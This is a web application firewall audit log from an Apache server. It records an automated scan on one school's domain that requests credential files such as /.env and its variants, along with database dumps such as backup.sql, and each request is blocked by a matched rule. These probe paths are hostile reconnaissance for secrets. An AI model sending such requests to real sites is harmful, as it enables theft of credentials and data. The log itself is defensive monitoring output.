Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63a06c28-Z-- --3a0c103e-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTlAAAAFc 103.236.140.4 56496 103.236.140.4 8181 --3a0c103e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --3a0c103e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a0c103e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785546598 675 (- - -) Stopwatch2: 1748084785546598 675; combined=273, p1=237, p2=0, p3=0, p4=0, p5=35, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a0c103e-Z-- --71372348-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OBAAAANY 103.236.140.4 56512 103.236.140.4 8181 --71372348-B-- GET /django/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --71372348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71372348-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785774907 813 (- - -) Stopwatch2: 1748084785774907 813; combined=298, p1=259, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71372348-Z-- --53e9b304-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTlgAAAFg 103.236.140.4 56514 103.236.140.4 8181 --53e9b304-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --53e9b304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e9b304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785859155 868 (- - -) Stopwatch2: 1748084785859155 868; combined=317, p1=273, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e9b304-Z-- --cc63725f-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OBQAAAM4 103.236.140.4 56516 103.236.140.4 8181 --cc63725f-B-- GET /nuxt/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --cc63725f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc63725f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785864518 825 (- - -) Stopwatch2: 1748084785864518 825; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc63725f-Z-- --0128d019-A-- [24/May/2025:18:06:25 +0700] aDGoMfmzt4abyoi_U9kAdQAAAIY 103.236.140.4 56522 103.236.140.4 8181 --0128d019-B-- GET /react/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0128d019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0128d019-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785967215 742 (- - -) Stopwatch2: 1748084785967215 742; combined=269, p1=234, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0128d019-Z-- --0753dc32-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTlwAAAE4 103.236.140.4 56526 103.236.140.4 8181 --0753dc32-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0753dc32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0753dc32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785974629 679 (- - -) Stopwatch2: 1748084785974629 679; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0753dc32-Z-- --ffbb1406-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTmAAAAEU 103.236.140.4 56528 103.236.140.4 8181 --ffbb1406-B-- GET /cp/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --ffbb1406-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffbb1406-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785986406 689 (- - -) Stopwatch2: 1748084785986406 689; combined=269, p1=229, p2=0, p3=0, p4=0, p5=40, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffbb1406-Z-- --078db733-A-- [24/May/2025:18:06:26 +0700] aDGoMuunkxaVeh4NwhbTmQAAAEs 103.236.140.4 56532 103.236.140.4 8181 --078db733-B-- GET /conf/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --078db733-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --078db733-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786076840 1000 (- - -) Stopwatch2: 1748084786076840 1000; combined=445, p1=384, p2=0, p3=0, p4=0, p5=60, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --078db733-Z-- --4cd3f24a-A-- [24/May/2025:18:06:26 +0700] aDGoMuunkxaVeh4NwhbTmgAAAE8 103.236.140.4 56534 103.236.140.4 8181 --4cd3f24a-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4cd3f24a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cd3f24a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786078351 573 (- - -) Stopwatch2: 1748084786078351 573; combined=216, p1=187, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cd3f24a-Z-- --5ff0d858-A-- [24/May/2025:18:06:26 +0700] aDGoMjvI5DIWBJ2mFG5OBgAAANI 103.236.140.4 56536 103.236.140.4 8181 --5ff0d858-B-- GET /server/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --5ff0d858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ff0d858-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786082049 719 (- - -) Stopwatch2: 1748084786082049 719; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ff0d858-Z-- --1a37dd3f-A-- [24/May/2025:18:06:26 +0700] aDGoMjvI5DIWBJ2mFG5OBwAAANU 103.236.140.4 56538 103.236.140.4 8181 --1a37dd3f-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --1a37dd3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a37dd3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786083460 606 (- - -) Stopwatch2: 1748084786083460 606; combined=232, p1=202, p2=0, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a37dd3f-Z-- --4e46a134-A-- [24/May/2025:18:06:30 +0700] aDGoNuunkxaVeh4NwhbToAAAAEI 103.236.140.4 56684 103.236.140.4 8181 --4e46a134-B-- GET /db.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4e46a134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e46a134-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790534626 2251 (- - -) Stopwatch2: 1748084790534626 2251; combined=861, p1=394, p2=437, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e46a134-Z-- --670cce35-A-- [24/May/2025:18:06:30 +0700] aDGoNuO2UzDOKMmK0i6lHwAAABc 103.236.140.4 56686 103.236.140.4 8181 --670cce35-B-- GET /database.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --670cce35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --670cce35-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790661949 1916 (- - -) Stopwatch2: 1748084790661949 1916; combined=765, p1=346, p2=386, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --670cce35-Z-- --2380395d-A-- [24/May/2025:18:06:30 +0700] aDGoNvmzt4abyoi_U9kAdgAAAIw 103.236.140.4 56688 103.236.140.4 8181 --2380395d-B-- GET /dump.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --2380395d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2380395d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790741359 1707 (- - -) Stopwatch2: 1748084790741359 1707; combined=621, p1=303, p2=292, p3=0, p4=0, p5=26, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2380395d-Z-- --ef336d07-A-- [24/May/2025:18:06:30 +0700] aDGoNuunkxaVeh4NwhbToQAAAEQ 103.236.140.4 56690 103.236.140.4 8181 --ef336d07-B-- GET /sql_backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --ef336d07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef336d07-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790756796 1595 (- - -) Stopwatch2: 1748084790756796 1595; combined=626, p1=308, p2=291, p3=0, p4=0, p5=26, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef336d07-Z-- --c123b702-A-- [24/May/2025:18:06:30 +0700] aDGoNuunkxaVeh4NwhbTogAAAFQ 103.236.140.4 56692 103.236.140.4 8181 --c123b702-B-- GET /backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c123b702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c123b702-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790886957 1744 (- - -) Stopwatch2: 1748084790886957 1744; combined=661, p1=339, p2=294, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c123b702-Z-- --380a8865-A-- [24/May/2025:18:06:30 +0700] aDGoNjvI5DIWBJ2mFG5OHQAAAMM 103.236.140.4 56694 103.236.140.4 8181 --380a8865-B-- GET /api.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --380a8865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --380a8865-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790966458 1807 (- - -) Stopwatch2: 1748084790966458 1807; combined=682, p1=314, p2=324, p3=0, p4=0, p5=44, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
